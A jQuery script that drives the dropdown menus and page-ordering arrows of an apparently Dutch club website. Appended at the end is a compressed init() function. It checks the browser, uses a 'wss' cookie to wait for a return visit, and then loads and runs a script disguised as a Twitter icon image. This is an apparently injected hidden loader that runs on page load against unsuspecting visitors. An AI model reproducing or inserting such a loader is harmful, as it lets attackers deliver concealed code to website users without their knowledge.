$(document).ready(function() {
	$('.menu_home, #ddm_home').bind('mouseenter mouseleave', function() {
		$('.menu_home').toggleClass('menu_home_hover');
	});
	$('.menu_overons, #ddm_overons').bind('mouseenter mouseleave', function() {
		$('.menu_overons').toggleClass('menu_overons_hover');
	});
	$('.menu_nieuws, #ddm_nieuws').bind('mouseenter mouseleave', function() {
		$('.menu_nieuws').toggleClass('menu_nieuws_hover');
	});
	$('.menu_agenda, #ddm_agenda').bind('mouseenter mouseleave', function() {
		$('.menu_agenda').toggleClass('menu_agenda_hover');
	});
	$('.menu_fotos, #ddm_fotos').bind('mouseenter mouseleave', function() {
		$('.menu_fotos').toggleClass('menu_fotos_hover');
	});
	$('.menu_gastenboek, #ddm_gastenboek').bind('mouseenter mouseleave', function() {
		$('.menu_gastenboek').toggleClass('menu_gastenboek_hover');
	});
	$('.menu_contact, #ddm_contact').bind('mouseenter mouseleave', function() {
		$('.menu_contact').toggleClass('menu_contact_hover');
	});
	$('.menu_stepintimetrophy, #ddm_stepintimetrophy').bind('mouseenter mouseleave', function() {
		$('.menu_stepintimetrophy').toggleClass('menu_stepintimetrophy_hover');
	});
	
	
	$('.menu_home').bind('mouseenter', function() {
		if ($('#ddm_home').css('display') == 'none') {
			$('#ddm_home').fadeIn("normal");
		}
	});
	$('.menu_home').bind('mouseleave', function() {
		$('#ddm_home').hide();
	});
	
	$('.menu_overons').bind('mouseenter', function() {
		if ($('#ddm_overons').css('display') == 'none') {
			$('#ddm_overons').fadeIn("normal");
		}
	});
	$('.menu_overons').bind('mouseleave', function() {
		$('#ddm_overons').hide();
	});
	
	$('.menu_nieuws').bind('mouseenter', function() {
		if ($('#ddm_nieuws').css('display') == 'none') {
			$('#ddm_nieuws').fadeIn("normal");
		}
	});
	$('.menu_nieuws').bind('mouseleave', function() {
		$('#ddm_nieuws').hide();
	});
	
	$('.menu_agenda').bind('mouseenter', function() {
		if ($('#ddm_agenda').css('display') == 'none') {
			$('#ddm_agenda').fadeIn("normal");
		}
	});
	$('.menu_agenda').bind('mouseleave', function() {
		$('#ddm_agenda').hide();
	});
	
	$('.menu_fotos').bind('mouseenter', function() {
		if ($('#ddm_fotos').css('display') == 'none') {
			$('#ddm_fotos').fadeIn("normal");
		}
	});
	$('.menu_fotos').bind('mouseleave', function() {
		$('#ddm_fotos').hide();
	});
	
	$('.menu_gastenboek').bind('mouseenter', function() {
		if ($('#ddm_gastenboek').css('display') == 'none') {
			$('#ddm_gastenboek').fadeIn("normal");
		}
	});
	$('.menu_gastenboek').bind('mouseleave', function() {
		$('#ddm_gastenboek').hide();
	});
	
	$('.menu_contact').bind('mouseenter', function() {
		if ($('#ddm_contact').css('display') == 'none') {
			$('#ddm_contact').fadeIn("normal");
		}
	});
	$('.menu_contact').bind('mouseleave', function() {
		$('#ddm_contact').hide();
	});
	
	$('.menu_stepintimetrophy').bind('mouseenter', function() {
		if ($('#ddm_stepintimetrophy').css('display') == 'none') {
			$('#ddm_stepintimetrophy').fadeIn("normal");
		}
	});
	$('.menu_stepintimetrophy').bind('mouseleave', function() {
		$('#ddm_stepintimetrophy').hide();
	});
	
	$('.ly_dropdown_menu').bind('mouseenter mouseleave', function() {
		if ($(this).css('display') == 'none') {
			$(this).show();
		} else {
			$(this).hide();
		}
	});
	
	$('img.order_up')
		.bind('mouseenter',	function() {this.src = 'img/icons/arrow_up_hover_10.png';})
		.bind('mouseleave',	function() {this.src = 'img/icons/arrow_up_10.png';})
		.bind('click',		function() {
			id = $(this).attr('id');
			id = id.split('_');
			
			document.location.href = 'page_order.php?a=up&id=' + (id[id.length-1]);
			return false;
		});
	$('img.order_down')
		.bind('mouseenter', function() {this.src = 'img/icons/arrow_down_hover_10.png';	})
		.bind('mouseleave', function() {this.src = 'img/icons/arrow_down_10.png';})
		.bind('click',		function() {
			id = $(this).attr('id');
			id = id.split('_');
			
			document.location.href = 'page_order.php?a=down&id=' + (id[id.length-1]);
			return false;
		});
});

function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/img/icons/twitter_32.png?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
